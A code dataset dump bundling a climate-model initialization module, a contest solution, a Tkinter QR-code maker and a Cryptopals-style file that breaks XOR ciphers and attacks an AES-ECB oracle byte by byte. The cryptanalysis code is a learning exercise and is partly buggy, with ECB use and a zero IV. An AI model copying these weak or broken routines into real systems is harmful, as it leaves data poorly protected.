'y'],\n 'units': 'J kg^-1',\n 'default_value': 0.\n },\n 'convective_heating_rate': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'zenith_angle': {\n 'dims': ['x', 'y'],\n 'units': 'radians',\n 'default_value': 0.\n },\n 'land_ice_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 0.\n },\n 'sea_ice_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 0.\n },\n 'surface_snow_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 0.\n },\n 'ocean_mixed_layer_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 50.\n },\n 'soil_layer_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 50.\n },\n 'soil_thermal_capacity': {\n 'dims': ['x', 'y'],\n 'units': 'J kg^-1 degK^-1',\n 'default_value': 2000.\n },\n 'area_type': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 'sea',\n 'dtype': 'a100'\n },\n 'snow_and_ice_temperature_spline': {\n 'dims': ['x', 'y'],\n 'units': 'degK',\n 'default_value': CubicSpline(\n np.linspace(0, 50, 50), 260.*np.ones(50)),\n 'dtype': object\n },\n 'sea_water_density': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-3',\n 'default_value': 1.029e3\n },\n 'surface_albedo_for_direct_shortwave': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.06\n },\n\n 'surface_albedo_for_diffuse_shortwave': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.06\n },\n\n 'surface_albedo_for_direct_near_infrared': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.06\n },\n\n 'surface_albedo_for_diffuse_near_infrared': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.06\n },\n 'soil_type': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 'clay',\n 'dtype': 'a100'\n },\n 'surface_roughness_length': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.0002,\n },\n 'surface_drag_coefficient_for_heat_in_air': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.0012,\n },\n 'surface_drag_coefficient_for_momentum_in_air': {\n 'dims': ['x', 'y'],\n 'units': 'dimensionless',\n 'default_value': 0.0012,\n },\n 'soil_temperature': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'degK',\n 'default_value': 274.,\n },\n}\n\n\ndef get_default_state(component_list,\n x={}, y={}, mid_levels={}, interface_levels={},\n initial_state={}):\n \"\"\"\n Return a state dictionary required to run the model.\n\n The model comprises of components in :code:`component_list`. If coordinate\n values in :code:`x`, :code:`y`, :code:`mid_levels` and :code:`interface_levels`\n are not provided, a single column\n centered at 0 degrees south, 0 degrees east, with 30 vertical levels is returned.\n\n Args:\n component_list (iterable): The _components for which a default\n state is required, in the order that they are called.\n It is assumed diagnostic outputs are updated into\n the state and passed into the next component, and that the state\n from the previous component is passed into the next component. The\n function will attempt to determine required inputs from the series\n of _components.\n\n x (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n units of the coordinate values.\n If :code:`x` is an empty dictionary, a single default value of 0 degrees longitude\n is used.\n\n y (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n units of the coordinate values.\n If :code:`y` is an empty dictionary, a single default value of 0 degrees latitude\n is used.\n\n mid_levels (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n units of the coordinate values.\n If :code:`mid_levels` is an empty dictionary, 30 levels of arbitrary units are used.\n\n interface_levels (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n units of the coordinate values.\n If :code:`interface_levels` is an empty dictionary, 31 levels of arbitrary units are used.\n\n initial_state (dict, optional): A dictionary containing some quantities that will\n also be added to the final output state. Must not contain any quantities that\n the output state will overwrite.\n\n\n Returns:\n default_state (dict):\n A state dictionary containing the requested\n quantities using the provided coordinate state.\n\n Raises:\n ValueError:\n if any of the following conditions are satisfied:\n\n * if :code:`component_list` is empty\n * if the shape of :code:`x['values']` and :code:`y['values']` is not the same\n * if only one of :code:`mid_levels` or :code:`interface_levels` is specified\n * if vertical coordinates are not one dimensional\n * if length of :code:`mid_levels['values']` is not one less than length\n of :code:`interface['values']`\n \"\"\"\n\n if len(component_list) == 0:\n raise ValueError('Component list must contain at least one component')\n\n if (len(mid_levels.keys()) == 0) != (len(interface_levels.keys()) == 0):\n raise ValueError('Both mid and interface levels must be specified')\n\n output_state = {}\n\n # Create 2D coordinate arrays\n if len(x.keys()) == 0:\n x_coordinate_values = np.zeros((1,))\n x_coordinate_label = 'longitude'\n x_coordinate_units = 'degrees_east'\n else:\n x_coordinate_values = x['values']\n x_coordinate_label = x['label']\n x_coordinate_units = x['units']\n\n if len(y.keys()) == 0:\n y_coordinate_values = np.zeros((1,))\n y_coordinate_label = 'latitude'\n y_coordinate_units = 'degrees_north'\n else:\n y_coordinate_values = y['values']\n y_coordinate_label = y['label']\n y_coordinate_units = y['units']\n\n if len(mid_levels.keys()) == 0:\n mid_levels_coordinate_values = np.arange(30)\n mid_levels_coordinate_label = 'mid_levels'\n mid_levels_coordinate_units = ''\n else:\n mid_levels_coordinate_values = mid_levels['values']\n mid_levels_coordinate_label = mid_levels['label']\n mid_levels_coordinate_units = mid_levels['units']\n\n if len(interface_levels.keys()) == 0:\n interface_levels_coordinate_values = np.arange(31)\n interface_levels_coordinate_label = 'interface_levels'\n interface_levels_coordinate_units = ''\n else:\n interface_levels_coordinate_values = interface_levels['values']\n interface_levels_coordinate_label = interface_levels['label']\n interface_levels_coordinate_units = interface_levels['units']\n\n if not x_coordinate_values.ndim == y_coordinate_values.ndim:\n raise ValueError('x and y coordinates must have the same shape')\n\n if mid_levels_coordinate_values.ndim > 1:\n raise ValueError(\n 'vertical coordinate mid_levels must be one dimensional.')\n\n if interface_levels_coordinate_values.ndim > 1:\n raise ValueError(\n 'vertical coordinate interface_levels must be one dimensional.')\n\n if len(mid_levels_coordinate_values) != len(interface_levels_coordinate_values)-1:\n raise ValueError('Interface levels must have one value more than mid levels')\n\n use_2d_coordinate = False\n two_dim_coord_dict = {}\n\n if x_coordinate_values.ndim == 2:\n if not x_coordinate_values.shape == y_coordinate_values.shape:\n raise ValueError(\n 'If x and y are 2d coordinates, they must have the same shape')\n\n two_dim_coord_dict[x_coordinate_label] = {}\n two_dim_coord_dict[x_coordinate_label]['values'] = x_coordinate_values\n two_dim_coord_dict[x_coordinate_label]['logical_dims'] = (\n 'logical_x_coordinate', 'logical_y_coordinate')\n two_dim_coord_dict[x_coordinate_label]['units'] = x_coordinate_units\n\n two_dim_coord_dict[y_coordinate_label] = {}\n two_dim_coord_dict[y_coordinate_label]['values'] = y_coordinate_values\n two_dim_coord_dict[y_coordinate_label]['logical_dims'] = (\n 'logical_x_coordinate', 'logical_y_coordinate')\n two_dim_coord_dict[y_coordinate_label]['units'] = y_coordinate_units\n\n output_state['x'] = DataArray(\n x_coordinate_values,\n dims=two_dim_coord_dict[x_coordinate_label]['logical_dims'],\n attrs={\n 'units': two_dim_coord_dict[x_coordinate_label]['units'],\n 'label': x_coordinate_label\n }\n )\n\n output_state['y'] = DataArray(\n y_coordinate_values,\n dims=two_dim_coord_dict[y_coordinate_label]['logical_dims'],\n attrs={\n 'units': two_dim_coord_dict[y_coordinate_label]['units'],\n 'label': y_coordinate_label\n }\n )\n\n x_coordinate_values = np.arange(\n two_dim_coord_dict[x_coordinate_label]['values'].shape[0])\n\n y_coordinate_values = np.arange(\n two_dim_coord_dict[x_coordinate_label]['values'].shape[1])\n\n x_coordinate_label = 'logical_x_coordinate'\n y_coordinate_label = 'logical_y_coordinate'\n\n x_coordinate_units = ''\n y_coordinate_units = ''\n\n use_2d_coordinate = True\n\n x_coordinate = DataArray(\n x_coordinate_values,\n dims=(x_coordinate_label),\n attrs={'units': x_coordinate_units, 'label': x_coordinate_label})\n\n output_state[x_coordinate_label] = x_coordinate\n add_direction_names(x=x_coordinate_label)\n\n y_coordinate = DataArray(\n y_coordinate_values,\n dims=(y_coordinate_label),\n attrs={'units': y_coordinate_units, 'label': y_coordinate_label})\n\n output_state[y_coordinate_label] = y_coordinate\n add_direction_names(y=y_coordinate_label)\n\n mid_levels_coordinate = DataArray(\n mid_levels_coordinate_values,\n dims=(mid_levels_coordinate_label,),\n attrs={'units': mid_levels_coordinate_units,\n 'label': mid_levels_coordinate_label})\n\n output_state[mid_levels_coordinate_label] = mid_levels_coordinate\n output_state['mid_levels'] = mid_levels_coordinate\n add_direction_names(\n z=mid_levels_coordinate_label)\n\n interface_levels_coordinate = DataArray(\n interface_levels_coordinate_values,\n dims=(interface_levels_coordinate_label,),\n attrs={'units': interface_levels_coordinate_units,\n 'label': interface_levels_coordinate_label})\n\n output_state[interface_levels_coordinate_label] = interface_levels_coordinate\n output_state['interface_levels'] = interface_levels_coordinate\n add_direction_names(\n z=interface_levels_coordinate_label)\n\n if not use_2d_coordinate:\n output_state['x'] = x_coordinate\n output_state['y'] = y_coordinate\n\n quantity_list = set()\n temporary_description = copy.deepcopy(climt_quantity_descriptions)\n additional_dimensions = {}\n additional_descriptions = {}\n\n for component in component_list:\n quantity_list = quantity_list.union(set(component.inputs))\n\n if hasattr(component, 'extra_dimensions'):\n ensure_no_shared_keys(additional_dimensions,\n component.extra_dimensions)\n\n for dimension in component.extra_dimensions.keys():\n if component.extra_dimensions[dimension].ndim > 1:\n raise NotImplementedError(\n 'Two dimensional coordinates in extra_dimensions not yet supported')\n\n output_state[dimension] = DataArray(\n component.extra_dimensions[dimension], dims=(dimension,))\n additional_dimensions[dimension] = output_state[dimension]\n\n if hasattr(component, 'quantity_descriptions'):\n ensure_no_shared_keys(additional_descriptions,\n component.quantity_descriptions)\n additional_descriptions.update(component.quantity_descriptions)\n\n temporary_description.update(additional_descriptions)\n for name in quantity_list:\n\n if name in output_state.keys():\n continue\n\n output_state[name] = get_default_values(\n name, x_coordinate, y_coordinate,\n mid_levels_coordinate,\n interface_levels_coordinate,\n initial_state,\n temporary_description,\n additional_dimensions)\n\n if use_2d_coordinate:\n\n for physical_dimension in two_dim_coord_dict.keys():\n\n output_state[name].coords[physical_dimension] = (\n two_dim_coord_dict[physical_dimension]['logical_dims'],\n two_dim_coord_dict[physical_dimension]['values'])\n\n output_state[name][physical_dimension].attrs['units'] = \\\n two_dim_coord_dict[physical_dimension]['units']\n\n ensure_no_shared_keys(initial_state, output_state)\n output_state.update(initial_state)\n if 'time' not in initial_state:\n output_state['time'] = datetime(1, 1, 1)\n return output_state\n\n\ndef get_default_values(quantity_name, x, y, mid_levels, interface_levels,\n initial_state, quantity_description, additional_dimensions={}):\n \"\"\"\n Returns default values for individual quantities.\n\n Args:\n quantity_name (string): string corresponding to a quantity in the pre-defined\n dictionary of names in :code:`quantity_description`.\n\n x (DataArray): DataArray containing the definition of the x coordinates.\n\n y (DataArray): DataArray containing the definition of the y coordinates.\n\n z (DataArray): DataArray containing the definition of the mid-level z coordinates.\n Quantities on interface levels will have a vertical dimension of size :code:`len(z)+1`.\n\n quantity_description (dict): Description of dimensions, units and default values of\n quantities to be used to create DataArrays.\n\n additional_dimensions (dict): Dictionary containing names and coordinates of dimensions\n that are not x,y,z (used for spectral bands in radiative codes, for example).\n\n \"\"\"\n\n description = quantity_description[quantity_name]\n\n dimension_length = {}\n dimension_length['x'] = x.values.shape[0]\n dimension_length['y'] = y.values.shape[0]\n dimension_length['mid_levels'] = len(mid_levels.values)\n dimension_length['interface_levels'] = len(interface_levels.values)\n\n mid_level_coords = np.arange(dimension_length['mid_levels'])\n int_level_coords = np.arange(dimension_length['interface_levels'])\n full_coords = {}\n full_coords['x'] = x\n full_coords['y'] = y\n full_coords['mid_levels'] = mid_level_coords\n full_coords['interface_levels'] = int_level_coords\n\n for dimension in additional_dimensions.keys():\n dimension_length[dimension] = additional_dimensions[dimension].shape[0]\n full_coords[dimension] = additional_dimensions[dimension].values\n\n quantity_dims = list(description['dims'])\n\n array_dims = [dimension_length[dimension] for dimension in quantity_dims]\n quantity_coords = [full_coords[dimension] for dimension in quantity_dims]\n\n quantity_dims = [x.label if elem is 'x' else elem for elem in quantity_dims]\n quantity_dims = [y.label if elem is 'y' else elem for elem in quantity_dims]\n\n if 'dtype' in description:\n dtype = description['dtype']\n else:\n dtype = 'float64'\n\n if 'default_value' in description:\n if dtype in ['a100', object]:\n quantity_array = np.ones(array_dims, dtype=dtype)\n quantity_array[:] = description['default_value']\n else:\n quantity_array = np.ones(array_dims, order='F', dtype=dtype)*description['default_value']\n elif 'init_func' in description:\n quantity_array = description['init_func'](array_dims, quantity_description, initial_state)\n else:\n raise ValueError(\n 'Malformed description for quantity {}:\\\n must contain default_value or init_func'.format(quantity_name))\n\n return DataArray(quantity_array, dims=quantity_dims,\n coords=quantity_coords, attrs={'units': description['units']})\n","repo_name":"rvalenzuelar/climt","sub_path":"climt/_core/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":30134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"9147154985","text":"import collections\n\nN = int(input())\nA = list(map(int, input().split()))\n\n\ndef div2(a):\n while a % 2 == 0:\n a //= 2\n return a\n\n\nAx2 = [div2(a) for a in A]\nAx2 = collections.Counter(Ax2)\n\nprint(len(Ax2))\n","repo_name":"mikiya1130/AtCoder","sub_path":"field/contests/abc019/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20837792765","text":"import qrcode\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nimport os\r\n#-------------------------------------------------------------------------------------------------------------\r\nclass QRKODYAPICI:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"QR KOD YAPICI\")\r\n\r\n self.data_label = ttk.Label(root, text=\"Veri Girişi:\")\r\n self.data_label.grid(row=0, column=0, padx=10, pady=10)\r\n\r\n self.data_entry = ttk.Entry(root)\r\n self.data_entry.grid(row=0, column=1, padx=30, pady=10)\r\n\r\n self.file_label = ttk.Label(root, text=\"Dosya Adı:\")\r\n self.file_label.grid(row=1, column=0, padx=10, pady=10)\r\n\r\n self.file_entry = ttk.Entry(root)\r\n self.file_entry.grid(row=1, column=1, padx=30, pady=10)\r\n\r\n self.generate_button = ttk.Button(root, text=\"QR Kodu Oluştur\", command=self.generate_qr_code)\r\n self.generate_button.grid(row=2, column=0, columnspan=2, pady=10)\r\n#-------------------------------------------------------------------------------------------------------------\r\n def generate_qr_code(self):\r\n data_to_encode = self.data_entry.get()\r\n file_name = self.file_entry.get()\r\n\r\n if not data_to_encode or not file_name:\r\n tk.messagebox.showerror(\"Hata\", \"Lütfen tüm alanları doldurun.\")\r\n return\r\n#-------------------------------------------------------------------------------------------------------------\r\n # Dosya adına \".png\" ekleniyor.\r\n file_name += '.png'\r\n\r\n # QRCode nesnesi oluşturuluyor.\r\n qr = qrcode.QRCode(\r\n version=1,\r\n box_size=10,\r\n border=4,\r\n )\r\n#-------------------------------------------------------------------------------------------------------------\r\n # Veri QR koduna ekleniyor.\r\n qr.add_data(data_to_encode)\r\n\r\n # QR kodu oluşturuluyor.\r\n qr.make()\r\n#-------------------------------------------------------------------------------------------------------------\r\n # Oluşturulan QR kodu bir görüntüye dönüştürülüyor.\r\n img = qr.make_image(fill_color=\"black\", back_color=\"white\")\r\n\r\n # Görüntü belirtilen dosya adıyla kaydediliyor.\r\n img.save(file_name)\r\n\r\n # Kullanıcıya başarılı bir şekilde kaydedildiğine dair bir mesaj gösteriliyor.\r\n tk.messagebox.showinfo(\"TAMAMLANDI!\", f\"QR kod '{file_name}' başarıyla kaydedildi.\")\r\n \r\n self.data_entry.delete(0, tk.END)\r\n self.file_entry.delete(0, tk.END)\r\n#-------------------------------------------------------------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = QRKODYAPICI(root)\r\n root.mainloop()\r\n","repo_name":"ZinedkA/U4_Kare_Kod","sub_path":"U4_Kare_Kod.py","file_name":"U4_Kare_Kod.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42076690456","text":"import base64\nimport re\nfrom itertools import cycle, zip_longest\nfrom collections import defaultdict\nimport sys\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\nimport struct\nimport codecs\nfrom random import randint, choice\n\ndecode_hex = codecs.getdecoder(\"hex_codec\")\nencode_hex = codecs.getencoder(\"hex_codec\")\n\n# ------------------ Utility Functions ------------------\n\nclass PaddingException(Exception):\n \"\"\"\n Thrown when a function expecting a PKCS7-padded string receives a string\n with invalid padding\n \"\"\"\n pass\n\n\ndef _string_from_file(infile):\n \"\"\"\n Converts the contents of infile into a single string, sans newlines\n \"\"\"\n text = \"\"\n with open(infile) as f:\n text = \"\".join(line.strip() for line in f)\n return text\n\n\ndef _display_hex(raw_hex_str):\n \"\"\"\n Python's `hex` function gives us a hex-formatted string, but it leaves a\n `0x` on the front, and if it's a long, it leaves an `L` on the end. So,\n we strip those out here\n \"\"\"\n return hex(raw_hex_str)[2:].replace(\"L\", \"\")\n\n\ndef _score_chars(word):\n \"\"\"\n Assigns a integer 'score' to a string.\n A higher score indicates it is more likely to be an English phrase.\n \"\"\"\n score = 0\n for char in word:\n if re.match(\"[A-Za-z ]\", char):\n score = score+1\n return score\n\n\n# TODO clean this one up\ndef hamming_distance(string1, string2):\n \"\"\"\n Finds the bitwise hamming distance between two b64-encoded strings.\n \"\"\"\n diffs = 0\n for x, y in zip (string1, string2):\n diffs = diffs + bin((int(encode_hex(bytes(x, 'utf-8'))[0], 16) ^ int(encode_hex(bytes(y, 'utf-8'))[0], 16))).count('1')\n return diffs / 1.0\n\n\n# From the pydocs: https://docs.python.org/3/library/itertools.html#itertools-recipes\ndef grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\n\n# ------------------ Main Functions ------------------\n\ndef hex_to_b64(hex_str):\n \"\"\" Converts a hex-formatted string into b64 bytes \"\"\"\n return base64.b64encode(decode_hex(hex_str)[0])\n\n\n# TODO this is only used in one test\ndef xor_two_buffers(buffer1, buffer2):\n \"\"\" Takes two hex-formatted strings and returns a hex-formatted string \"\"\"\n return _display_hex(int(buffer1, 16) ^ int(buffer2, 16))\n\n\n# TODO squash this into the previous method\ndef xor_two_buffers_mod(buffer1, buffer2):\n \"\"\" Takes a string and a bytes, xors them together, and returns bytes \"\"\"\n result = []\n for i, k in zip(buffer1, list(buffer2)):\n result.append(i ^ k)\n return bytes(result)\n\n\ndef decode_single_byte_xor_cypher(hex_str, retkey=False):\n \"\"\"\n Takes a hex-formatted string which has been encrypted with single-byte xor.\n Returns the decrypted string.\n If retkey is True, we return [decrypted_string, key_used_to_decrypt]\n \"\"\"\n max_score = 0\n best_match = \"\"\n for key in range(255):\n xor_result = [chr(byte ^ key) for byte in list(decode_hex(hex_str)[0])]\n xor_result = ''.join(xor_result)\n score = _score_chars(xor_result)\n if score > max_score:\n max_score = score\n best_match = xor_result\n best_key = key\n if retkey:\n return [best_match, best_key]\n else:\n return best_match\n\n\ndef detect_single_byte_xor_cypher(infile):\n \"\"\"\n Given a file of hex-formatted strings, determine which one has been\n encrypted with single-byte xor and return it\n \"\"\"\n max_score = 0\n best_match = \"\"\n with open(infile) as f:\n for line in f:\n xor_result = decode_single_byte_xor_cypher(line.rstrip())\n score = _score_chars(xor_result)\n if score > max_score:\n max_score = score\n best_match = xor_result\n return best_match.rstrip()\n\n\ndef repeating_key_xor_encrypt(plaintext, key):\n \"\"\"\n Given plaintext and key, uses key to encrypt plaintext via repeating XOR\n and returns the result\n \"\"\"\n keychargen = cycle(key)\n result = \"\"\n for plainchar in plaintext:\n # Plainchar is a unicode string. We get the ascii value of that representation,\n # then XOR it against the next value in the key iterator. Then we find out what the\n # resultant character is.\n result = result + str(ord(plainchar) ^ ord(next(keychargen)))\n return result\n\n\ndef guess_keylength(cyphertext):\n smallest_so_far = 999999999999999999999\n true_keylen = None\n for keysize in range(2, 100): # Test every key size.\n chunks = []\n normalized_distances = []\n # For each potential key, get four chunks o' bytes that are the size of the key.\n for keychunknum in range(4):\n index = keysize*keychunknum\n chunks.append([cyphertext[x] for x in range(index, index+keysize)])\n\n for i in range(3):\n norm_dist = hamming_distance(''.join(chunks[i]), ''.join(chunks[i+1]))\n normalized_distances.append(norm_dist) # To self: is the b64 stuff going to screw anything up?\n avg = float(sum(normalized_distances))/len(normalized_distances)/keysize\n print(avg)\n if avg < smallest_so_far:\n smallest_so_far = avg\n true_keylen = keysize\n return true_keylen\n\n\n# This is a \"lazy\" vignere decrypter; it's using brute force.\n# TODO come back and make it less brute-force-y\ndef decrypt_vigenere(infile):\n cyphertext = _string_from_file(infile)\n cyphertext = base64.b64decode(cyphertext)\n max_score = 0\n best_keylen = 0\n best_key = \"\"\n for keylength in range(2, 40):\n\n # We want to create a block that contains only the first byte of\n # every block, the second byte of every block, etc, up to KEYLENGTH.\n blocks = defaultdict(str)\n keylength_cycle = cycle(range(keylength))\n for byte in cyphertext:\n index = next(keylength_cycle)\n blocks[index] = blocks[index] + byte\n decoded_chunked = \"\"\n \n totalkey = \"\"\n for i in range(keylength):\n value = decode_single_byte_xor_cypher(blocks[i].encode(\"hex\"), retkey=True)\n decoded_text_chunk = value[0]\n totalkey = totalkey + chr(value[1])\n decoded_chunked = decoded_chunked + decoded_text_chunk\n if _score_chars(decoded_chunked) > max_score:\n max_score = score_chars(decoded_chunked)\n best_keylen = keylength\n best_key = totalkey\n\n # We now have the best key.\n # Use it to decrypt the file.\n best_key_cycle = cycle(best_key)\n for byte in cyphertext:\n sys.stdout.write(chr(ord(byte) ^ ord(next(best_key_cycle))))\n\n\n# TODO remove the from_b64 flag\ndef aes_128_in_ecb_mode(instring, key, action, from_b64=True):\n \"\"\"\n Allows encrypt or decryption via AES-128 in ECB mode\n If action==\"encrypt\", this encrypts the contents of infile with key and returns the result.\n If action==\"decrypt\", this instead returns the *decrypted* contents of infile.\n Else, returns None.\n \"\"\"\n cyphertext = instring\n cyphertext = cyphertext if not from_b64 else base64.b64decode(cyphertext)\n if action == \"encrypt\":\n return AES.new(key).encrypt(cyphertext)\n elif action == \"decrypt\":\n return AES.new(key).decrypt(cyphertext)\n else:\n return\n\n\ndef detect_ecb(cyphertext):\n \"\"\" Returns True if cyphertext appears to be ECB-encrypted; else False \"\"\"\n sets = []\n for group in grouper(cyphertext, 16):\n sets.append(group)\n if len(set(sets)) < len(sets):\n return True\n return False\n\n\ndef detect_aes_128_in_ecb_mode(infile):\n \"\"\"\n Detects which line in `infile` has been encrypted with AES-128 in ECB mode\n and returns that line.\n\n Note: this returns the FIRST probable ciphered line, not ALL probable\n ciphered lines.\n \"\"\"\n with open(infile) as f:\n for i, line in enumerate(f):\n cyphertext = decode_hex(line.strip())[0]\n # Problem hinted at doing 16 bytes at a time, so let's try that\n if detect_ecb(cyphertext):\n return (\"Line \" + str(i) + \": \" + str(line.strip()))\n\ndef strip_padding(padded_string):\n \"\"\"\n Strips away the PKCS7 padding from a string and returns it. If padding is\n invalid, raises a PaddingException\n \"\"\"\n reversed_input = padded_string[::-1]\n # 01 is valid, 02 02 is valid, 03 03 03 is valid...\n for i in range(1, len(reversed_input)):\n if [val for val in reversed_input[0:i]] == [i for num in range(0,i)]:\n return padded_string[:-i]\n\n\ndef pkcs7_padding(utf8_string, target_blocksize, padding_amount=False):\n \"\"\"\n Takes a string and pads it to target_blocksize length.\n If padding_amount is set, this will instead just add that amount to the end.\n \"\"\"\n bytetext = bytearray(utf8_string)\n if not padding_amount:\n padding_amount = target_blocksize - (len(bytetext) % target_blocksize)\n for i in range(0, padding_amount):\n bytetext.extend(bytes([padding_amount]))\n return bytetext\n\n\n# I found the diagram on the CBC wikipedia article very helpful for this!\n# https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29\n# TODO clean this up wow it's super ugly and I bet we're using it again too\n# start by removing from_b64 flag and make iv optional\ndef cbc_mode(instring, key, iv, action, from_b64=True):\n # Read in the string, if it's from a file\n text = instring\n # b64decode the string, if it's in b64 format\n text = base64.b64decode(text) if from_b64 else text\n keysize = len(key)\n iv = iv * keysize\n # In CBC, we'll be XORing each block against the previous block, so:\n prev_block = None\n # This will hold the result of either our decryption or encryption\n modtext = b''\n\n if action == \"encrypt\":\n for group in grouper(text, keysize):\n filtered_group = bytes([0 if i is None else i for i in group])\n # If we're on the first block, XOR against IV; else, XOR against prev_block\n if not prev_block:\n temp_block = xor_two_buffers_mod(filtered_group, iv)\n else:\n temp_block = xor_two_buffers_mod(prev_block, filtered_group)\n # then encrypt & append to modtext\n prev_block = aes_128_in_ecb_mode(temp_block, key, \"encrypt\", from_b64=False)\n modtext = modtext + prev_block\n return modtext\n\n elif action == \"decrypt\":\n for group in grouper(text, keysize):\n filtered_group = bytes([0 if i is None else i for i in group])\n # Decrypt the current block\n temp_block = aes_128_in_ecb_mode(filtered_group, key, \"decrypt\", from_b64=False)\n # If we're on the first block, XOR against IV; else, XOR against prev_block\n if not prev_block:\n plain_block = xor_two_buffers_mod(temp_block, iv)\n else:\n plain_block = xor_two_buffers_mod(temp_block, prev_block)\n modtext = modtext + plain_block\n prev_block = filtered_group\n return modtext\n\n else:\n return\n\n\ndef random_length_bytes():\n \"\"\" Generates a random sequence of bytes, with a random length between 1 and 25 \"\"\"\n return bytes([randint(0,255) for i in range(0, randint(1,25))])\n\n\ndef random_aes_key():\n \"\"\" Generates a random AES key (16 bytes in length) \"\"\"\n return bytes([randint(0,255) for i in range(0, 16)])\n\n\ndef encryption_oracle(instring):\n \"\"\"\n Encrypts `instring` using either ECB or CBC (choosing between the two at random).\n \"\"\"\n instring = bytes(instring, \"utf-8\")\n encrypted = \"\"\n blocksize = 16\n iv = blocksize * b'\\x00'\n key = random_aes_key()\n\n # We want to prepend 5-10 random bytes and appends 5-10 random bytes\n to_prepend = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n to_append = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n\n # We'll need to pad instring s.t. len(to_prepend + instring + padding + to_append) % 16 == 0\n padding_amount = (blocksize - len(to_prepend + instring + to_append) % 16)\n instring = to_prepend + pkcs7_padding(instring, blocksize, padding_amount) + to_append\n instring = bytes(instring)\n\n if randint(0, 1) == 0:\n encrypted = (aes_128_in_ecb_mode(instring, key, \"encrypt\", from_b64=False), \"ECB\")\n else:\n encrypted = (cbc_mode(instring, key, iv, \"encrypt\", from_b64=False), \"CBC\")\n return encrypted\n\n\ndef detect_ecb_or_cbc(input):\n \"\"\"\n This is super-lazy and just assumes, if it's not ECB, must be CBC! It works\n for the purpose of the cryptochallenges (so far) but could be better :D;;;\n \"\"\"\n if detect_ecb(input):\n return \"ECB\"\n else:\n return \"CBC\"\n\n\n# TODO could probably squash this into something else\ndef magic_text_oracle(instring, key, magic_text, add_rand_chars=True, action=\"encrypt\"):\n \"\"\"\n Encrypts `instring` + `magic_text` using ECB mode and the given key.\n \"\"\"\n instring = instring + magic_text\n encrypted = \"\"\n blocksize = 16\n iv = blocksize * b'\\x00'\n\n if add_rand_chars:\n # We want to prepend 5-10 random bytes and appends 5-10 random bytes\n to_prepend = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n to_append = bytes([randint(0, 255) for i in range(0, randint(5, 10))])\n else:\n to_prepend = b''\n to_append = b''\n\n # We'll need to pad instring s.t. len(to_prepend + instring + padding + to_append) % 16 == 0\n padding_amount = (blocksize - len(to_prepend + instring + to_append) % 16)\n instring = to_prepend + pkcs7_padding(instring, blocksize, padding_amount) + to_append\n instring = bytes(instring)\n\n return aes_128_in_ecb_mode(instring, key, action, from_b64=False)\n\n\n# TODO this is done elsewhere, use this function there rather than the dupe\n# also this is wonky can't we just hand it encrypted text?\ndef detect_block_size(key):\n \"\"\"\n Detects the blocksize used for encryption.\n If it cannot be detected, or the blocksize is not between 4 and 256,\n returns None.\n \"\"\"\n for potential_blocksize in range(4, 256):\n test_str = bytes(\"\".join([chr(i) for i in [randint(65,90) for j in range(0, potential_blocksize)]]), \"utf-8\")\n crypted = magic_text_oracle(test_str*25, key, b'', add_rand_chars=False)\n sets = []\n for group in grouper(crypted, potential_blocksize):\n sets.append(group)\n if len(set(sets)) == 2:\n return potential_blocksize\n return None\n\n\ndef craft_input_block(target_size):\n \"\"\" Returns a bytestring of 'AAA...'s, with length target_size \"\"\"\n return b'A' * target_size\n\n\n# could probably better separate concerns\ndef decrypt_magic_text(magic_text, key):\n \"\"\" Decrypts magic_text using byte-at-a-time decryption \"\"\"\n magic_text = base64.b64decode(magic_text)\n block_size = detect_block_size(key) # is 16, but we compute 